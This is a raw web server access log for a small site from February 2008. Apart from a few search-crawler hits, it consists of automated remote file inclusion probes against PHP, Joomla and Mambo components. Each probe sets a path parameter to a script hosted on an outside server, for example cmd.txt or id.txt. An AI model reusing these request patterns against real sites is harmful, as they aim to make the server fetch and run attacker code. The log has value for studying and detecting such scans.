74.6.25.73 - - [12/Feb/2008:10:39:42 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.203 - - [12/Feb/2008:10:40:12 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:40:25 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:40:26 -0800] "GET //main.php?sayfa=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:40:29 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:40:32 -0800] "GET /logs//main.php?sayfa=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.44 - - [12/Feb/2008:10:40:40 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [12/Feb/2008:10:40:40 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [12/Feb/2008:10:40:40 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ag-mgt.com/blog/skins/rss2.0/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [12/Feb/2008:10:40:46 -0800] "GET /logs/index3.php?gallery=http://www.fabriziozingales.it//cic2/id_wav/.../tt.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
205.234.242.100 - - [12/Feb/2008:10:40:47 -0800] "GET /index3.php?gallery=http://www.fabriziozingales.it//cic2/id_wav/.../tt.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:10:41:53 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.199.102.117 - - [12/Feb/2008:10:42:45 -0800] "GET /logs/access_080131.log/administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:43:50 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:43:50 -0800] "GET //skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:43:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:44:46 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:44:46 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:44:47 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:46:47 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:10:46:50 -0800] "GET /logs//?pg=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 34262 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:10:46:50 -0800] "GET //?pg=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:10:46:51 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:10:46:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:10:46:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:47:13 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [12/Feb/2008:10:47:54 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [12/Feb/2008:10:47:54 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.124.24 - - [12/Feb/2008:10:48:04 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.244.82 - - [12/Feb/2008:10:48:13 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.244.82 - - [12/Feb/2008:10:48:14 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:48:45 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:48:45 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:49:00 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:49:13 -0800] "GET /logs/access_080121.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:49:14 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:49:14 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:10:51:04 -0800] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:10:51:04 -0800] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
81.177.16.41 - - [12/Feb/2008:10:51:12 -0800] "GET /logs/templates/Official/part_mps.php?template_pathhttp://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.177.16.41 - - [12/Feb/2008:10:51:12 -0800] "GET /templates/Official/part_mps.php?template_pathhttp://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:10:51:35 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:10:52:02 -0800] "GET /logs/access_071216.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:10:52:02 -0800] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:10:52:03 -0800] "GET /logs//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:52:31 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:10:52:41 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:10:55:10 -0800] "GET /logs/access_080130.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:55:27 -0800] "GET /logs/access_080122.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:10:55:27 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.41 - - [12/Feb/2008:10:56:16 -0800] "GET //components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.177.16.41 - - [12/Feb/2008:10:56:16 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:57:53 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:57:54 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:57:54 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:58:58 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:58:58 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:58:58 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:10:59:49 -0800] "GET /logs/access_080122.log/myevent.php?myevent_path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.164.34 - - [12/Feb/2008:10:59:59 -0800] "GET /administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:00:15 -0800] "GET /logs/access_080122.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:00:16 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:11:01:18 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:11:01:18 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:11:01:19 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:01:24 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:01:24 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:01:25 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:01:43 -0800] "GET /logs/access_080122.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:11:01:43 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.205.44 - - [12/Feb/2008:11:02:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:02:53 -0800] "GET /logs/access_080131.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:04:16 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:04:16 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:04:16 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:11:04:19 -0800] "GET /logs/access_071216.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:11:04:20 -0800] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:11:04:20 -0800] "GET /logs//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:11:04:34 -0800] "GET /logs/access_080122.log//content/multithumb/multithumb?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:11:04:35 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:11:04:36 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:11:06:26 -0800] "GET /logs/access_080130.log//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:07:09 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:07:09 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:07:09 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.87.59 - - [12/Feb/2008:11:07:46 -0800] "GET /logs/access_071220.log//?index.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.87.59 - - [12/Feb/2008:11:07:46 -0800] "GET //?index.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/safe.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.87.59 - - [12/Feb/2008:11:07:47 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/safe.txt? HTTP/1.1" 200 34970 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.87.59 - - [12/Feb/2008:11:08:02 -0800] "GET /logs/access_071221.log//?index.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:08:10 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:08:21 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:08:21 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:11:08:22 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.154 - - [12/Feb/2008:11:08:31 -0800] "GET /logs/access_070911.log HTTP/1.0" 200 86699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:09:02 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:09:02 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:09:02 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:11:09:59 -0800] "GET /logs/access_080120.log//content/multithumb/multithumb?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:01 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:10:09 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:10:12 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.29.25 - - [12/Feb/2008:11:10:16 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [12/Feb/2008:11:10:17 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [12/Feb/2008:11:10:18 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:21 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:21 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:22 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:11:10:24 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:43 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:43 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:11:10:43 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
207.157.58.25 - - [12/Feb/2008:11:10:44 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
